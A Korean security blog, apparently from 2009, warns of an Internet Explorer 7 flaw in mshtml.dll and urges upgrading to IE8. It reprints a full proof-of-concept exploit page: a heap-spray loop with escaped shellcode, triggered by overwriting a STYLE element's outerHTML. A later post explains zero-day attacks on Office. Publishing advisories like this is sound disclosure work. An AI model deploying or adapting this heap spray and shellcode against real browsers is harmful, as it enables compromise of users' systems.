시큐리티포커스에 올라온 버그트랙에 보면 IE7.0 취약서을 이용한 공격 익스플로잇 소스가 공개 되었습니다. 사용자 주의가 요망됩니다.

http://www.securityfocus.com/archive/1/507984/30/0/threaded


<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload="load()">
</BODY>
</HTML>



알려진 바로는  Microsoft HTML viewer (mshtml.dll)  와 internal style sheet  (CSS/STYLE) object via document.getElementsByTagName() method  를 공격하는 것으로 나타났다. (관련글 링크 : 여기)        


http://seclists.org/bugtraq/2009/Nov/148  에도 링크가 되어 있는데 백신에서 바로 감지하네요..


익스플로러 취약성 공격코드




MS 다음패치일인 12월8일에 패치 될것으로 생각되고 있고 IE8.0 에서는 이러한 취약점이 발견되지 않은 것으로 알려지고 있다.  빠른 시일내에 업그레이드를 해야만 하겠다. 참고 바랍니다.

지금 바로 IE8.0 으로 업그레이드 하시기 바랍니다.


Posted by 엔시스

MS오피스 취약점 노린 제로데이 공격 증가
머니투데이
... 올해 상반기에만 워드와 엑셀의 보안 취약점이 10개 가까이 발견됐으며, 이 중 보안패치가 발표되기 이전에 악성코드가 등장하는 형태의 제로 데이 공격만 2건. 7월 들어서는 파워포인트를 겨냥한 제로 데이 공격도 등장했다. ...

제로데이 공격이 날로 증가하게 됩니다. 그만큼 우리에게 다가올수 있는 위협이 빠르고 크다는 사실을 아는 사람은 그리 많지 않다는데 문제가 있습니다. 그저 남의 집 불 구경 하듯이 하면 정작 자신의 집에 어디선가 연기 나는지 모르는게 문제입니다

* 제로데이 공격

시스템의 보안 취약점이 발견된 상태에서 이를 보완할 수 있는 보안패치가 발표되기 전에 해당 취약점을 이용해 이뤄지는 해킹이나 악성코드 공격을 말합니다. 공격의 신속성을 나타내는 의미로 제로 데이(Zero-day)라는 말이 붙었습니다. 일반적으로 취약점이 발견되면 개발자가 취약점을 보완하는 보안패치를 배포해 사용자들이 이를 다운로드받아 공격 위협에 대처하는 것이 보통입니다. 그러나 제로데이 공격은 보안패치가 발표되기 전에 공격이 이뤄지기 때문에 이렇다할 대응 조치가 없는 상태에서 일시에 많은 피해를 유발할 수 있어 전 세계 보안업계에서 가장 우려하고 있는 공격 방식입니다.

최근 발생한 마이크로소프트(MS)의 윈도메타파일(WMF) 취약점을 이용한 악성코드 공격은 취약점이 발견된 지 채 하루도 되지 않아 이뤄졌다는 점에서 제로데이 공격으로 볼 수 있으며 이는 세계 최초로 이뤄진 것입니다

Posted by 엔시스